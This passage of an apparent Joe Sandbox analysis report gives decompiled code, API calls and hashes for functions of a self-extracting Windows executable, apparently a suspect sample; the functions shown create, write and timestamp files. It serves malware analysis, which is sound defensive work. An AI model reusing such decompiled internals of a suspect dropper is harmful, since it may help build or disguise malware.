                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      • API String ID: 3625706803-1193786559
                                                                                                                                                                                                      • Opcode ID: a8afe198cf709b26f545381988f3de396ed4fb5eabf12fea00bab410b55458c6
                                                                                                                                                                                                      • Instruction ID: d4861a6489d6ae810cb4458c47c921dc3021c03570a382f60164912fe89bb709
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8afe198cf709b26f545381988f3de396ed4fb5eabf12fea00bab410b55458c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A44125B62001028BCB369F38E9446F573A5EB45308B04EA69D9CEB71D5DB71DE8AC750
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E74C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0xe78d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0xe78d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00e74c40
                                                                                                                                                                                                      0x00e74c4a
                                                                                                                                                                                                      0x00e74c8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74c70
                                                                                                                                                                                                      0x00e74c70
                                                                                                                                                                                                      0x00e74c7e
                                                                                                                                                                                                      0x00e74c86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74c8a

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00E74C54
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E74C66
                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E74C7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                      • Opcode ID: 1457b259106b2c1d2baf15e5a0c940f97593c1293e7e87fd9b1ca984fa01a1c9
                                                                                                                                                                                                      • Instruction ID: 0d82a3195164e36523661d5fb46fbece79f79737d8a5f953b167599841426f17
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1457b259106b2c1d2baf15e5a0c940f97593c1293e7e87fd9b1ca984fa01a1c9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F096B260110C6FAB25DFB5CC48DBBB7ADEB54344744453BA51DE1090EB30D954C760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00E7487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00E7490C(_t11);
                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00e74880
                                                                                                                                                                                                      0x00e7488c
                                                                                                                                                                                                      0x00e74894
                                                                                                                                                                                                      0x00e748a0
                                                                                                                                                                                                      0x00e748c9
                                                                                                                                                                                                      0x00e748ce
                                                                                                                                                                                                      0x00e748a2
                                                                                                                                                                                                      0x00e748a8
                                                                                                                                                                                                      0x00e748b7
                                                                                                                                                                                                      0x00e748bc
                                                                                                                                                                                                      0x00e748aa
                                                                                                                                                                                                      0x00e748ac
                                                                                                                                                                                                      0x00e748ac
                                                                                                                                                                                                      0x00e748a8
                                                                                                                                                                                                      0x00e748de
                                                                                                                                                                                                      0x00e748e7
                                                                                                                                                                                                      0x00e7490b
                                                                                                                                                                                                      0x00e748ee
                                                                                                                                                                                                      0x00e748f0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74902

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00E74A23,?,00E74F67,*MEMCAB,00008000,00000180), ref: 00E748DE
                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00E74F67,*MEMCAB,00008000,00000180), ref: 00E74902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: d7796819f2443a314af861f746251513c546fe50785c484025e82032612c7631
                                                                                                                                                                                                      • Instruction ID: 7a97adfb41707dfa9e523afa417d5f3f05cf47553c7909c5dfa61b7b5450f1f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7796819f2443a314af861f746251513c546fe50785c484025e82032612c7631
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 270178E3E126342AF22880295C88FB7440CCBDA635F1A5230BEAEB61D1D2644C0482E0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E74AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 =  *0xe7858c; // 0x268
                                                                                                                                                                                                      				_t9 = E00E73680(_t20);
                                                                                                                                                                                                      				if( *0xe791d8 == 0) {
                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                      					_t12 = WriteFile( *(0xe78d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      							_t14 =  *0xe79400; // 0x11eea6
                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                      							 *0xe79400 = _t15;
                                                                                                                                                                                                      							if( *0xe78184 != 0) {
                                                                                                                                                                                                      								_t21 =  *0xe78584; // 0x0
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xe793f8, 0);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00e74ad5
                                                                                                                                                                                                      0x00e74adb
                                                                                                                                                                                                      0x00e74ae7
                                                                                                                                                                                                      0x00e74aee
                                                                                                                                                                                                      0x00e74b05
                                                                                                                                                                                                      0x00e74b0d
                                                                                                                                                                                                      0x00e74b14
                                                                                                                                                                                                      0x00e74b1a
                                                                                                                                                                                                      0x00e74b1c
                                                                                                                                                                                                      0x00e74b21
                                                                                                                                                                                                      0x00e74b2a
                                                                                                                                                                                                      0x00e74b2f
                                                                                                                                                                                                      0x00e74b31
                                                                                                                                                                                                      0x00e74b39
                                                                                                                                                                                                      0x00e74b54
                                                                                                                                                                                                      0x00e74b54
                                                                                                                                                                                                      0x00e74b39
                                                                                                                                                                                                      0x00e74b2f
                                                                                                                                                                                                      0x00e74b0f
                                                                                                                                                                                                      0x00e74b0f
                                                                                                                                                                                                      0x00e74b0f
                                                                                                                                                                                                      0x00e74b5e
                                                                                                                                                                                                      0x00e74ae9
                                                                                                                                                                                                      0x00e74aed
                                                                                                                                                                                                      0x00e74aed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E73680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E7369F
                                                                                                                                                                                                        • Part of subcall function 00E73680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E736B2
                                                                                                                                                                                                        • Part of subcall function 00E73680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E736DA
                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00E74B05
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                      • Opcode ID: 7db221414663c257b4908a78865e1de0b2398c8caaf87293c79176c25893524e
                                                                                                                                                                                                      • Instruction ID: fb23d2d4b2e74574d40a8dfecf0e070aba4ca2bf677c5707e348fcd7a5f227eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7db221414663c257b4908a78865e1de0b2398c8caaf87293c79176c25893524e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001A971240201AFDB14CF6AEC09BA6B769AB44729F089225E93DB71E1CB30CC95CB80
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E7658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0xe78b3f
                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0xe78b40
                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return E00E716B3(_t16, _t10, _t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x00e76592
                                                                                                                                                                                                      0x00e76594
                                                                                                                                                                                                      0x00e76596
                                                                                                                                                                                                      0x00e76598
                                                                                                                                                                                                      0x00e76598
                                                                                                                                                                                                      0x00e7659b
                                                                                                                                                                                                      0x00e7659b
                                                                                                                                                                                                      0x00e7659d
                                                                                                                                                                                                      0x00e7659e
                                                                                                                                                                                                      0x00e765a2
                                                                                                                                                                                                      0x00e765a4
                                                                                                                                                                                                      0x00e765a9
                                                                                                                                                                                                      0x00e765b2
                                                                                                                                                                                                      0x00e765b6
                                                                                                                                                                                                      0x00e765ba
                                                                                                                                                                                                      0x00e765c3
                                                                                                                                                                                                      0x00e765c5
                                                                                                                                                                                                      0x00e765c8
                                                                                                                                                                                                      0x00e765c8
                                                                                                                                                                                                      0x00e765c3
                                                                                                                                                                                                      0x00e765c9
                                                                                                                                                                                                      0x00e765cc
                                                                                                                                                                                                      0x00e765d2
                                                                                                                                                                                                      0x00e765d1
                                                                                                                                                                                                      0x00e765d1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e765dc
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(00E78B3E,00E78B3F,00000001,00E78B3E,-00000003,?,00E760EC,00E71140,?), ref: 00E765BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                      • Opcode ID: 903a34d34e2d2b7e9c0d310593f5669d635e6606711bd59f2749560589277e8d
                                                                                                                                                                                                      • Instruction ID: bca56a6774dc6f2f8886705452ec377dd2df22e2aaaa633e68cd5dd0e3d3abaf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 903a34d34e2d2b7e9c0d310593f5669d635e6606711bd59f2749560589277e8d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DF0AC321046519FD332091D9884BA6BFCEDBC6318F28996EE8DEE3245DA658C45A3A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E7621E() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					0x4f0 = 2;
                                                                                                                                                                                                      					_t9 = E00E7597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00E744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00e76229
                                                                                                                                                                                                      0x00e76230
                                                                                                                                                                                                      0x00e76247
                                                                                                                                                                                                      0x00e7626a
                                                                                                                                                                                                      0x00e76272
                                                                                                                                                                                                      0x00e76249
                                                                                                                                                                                                      0x00e76255
                                                                                                                                                                                                      0x00e7625f
                                                                                                                                                                                                      0x00e76264
                                                                                                                                                                                                      0x00e76264
                                                                                                                                                                                                      0x00e76284

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E7623F
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                      • Opcode ID: 7b8618a219188790249b07d5497d59429ecb7b7ae94b6f9e9c9ee4ecd6c5c182
                                                                                                                                                                                                      • Instruction ID: fbb3e96c23c09ef994ad7b8ec005b6965d880c607dea7876160e303a83a14d24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b8618a219188790249b07d5497d59429ecb7b7ae94b6f9e9c9ee4ecd6c5c182
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F0E9B0700208AFE790EB749D06FBE73ECDB94304F408479B98DF6092ED749D848650
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E74B60(signed int _a4) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 = _a4 * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0xe78d64)) != 1) {
                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0xe78d74)); // executed
                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0xe78d60)) = 1;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe78d60)) = 1;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe78d68)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe78d70)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe78d6c)) = 0;
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x00e74b66
                                                                                                                                                                                                      0x00e74b74
                                                                                                                                                                                                      0x00e74b98
                                                                                                                                                                                                      0x00e74ba0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74bac
                                                                                                                                                                                                      0x00e74ba4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74ba4
                                                                                                                                                                                                      0x00e74b78
                                                                                                                                                                                                      0x00e74b7e
                                                                                                                                                                                                      0x00e74b84
                                                                                                                                                                                                      0x00e74b8a
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00E74FA1,00000000), ref: 00E74B98
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: dd4682ecd126857fc57e578e429eb932605e6cd4c5824dc48d2a780f6f3bfd45
                                                                                                                                                                                                      • Instruction ID: 13fcdfaeceeb7bda2e0ba45b54d37b259fa7668a616343e8fd43bcf8449210b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd4682ecd126857fc57e578e429eb932605e6cd4c5824dc48d2a780f6f3bfd45
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55F0F471680B089E4771CE398D08552BBEAAAB53A17105A2B956EF21D4DB30AC41CB90
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E766AE(CHAR* __ecx) {
                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x00e766b1
                                                                                                                                                                                                      0x00e766ba
                                                                                                                                                                                                      0x00e766c7
                                                                                                                                                                                                      0x00e766bc
                                                                                                                                                                                                      0x00e766be
                                                                                                                                                                                                      0x00e766be

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00E74777,?,00E74E38,?), ref: 00E766B1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      • Opcode ID: 9ce59ad6c2b950e1bea0ae296f64025bcc687e41c05bff0ed9aca237e1cb5162
                                                                                                                                                                                                      • Instruction ID: d69084bc5bcc03c815579235f12f19ea8c175c0a8c29e195a45431909c702499
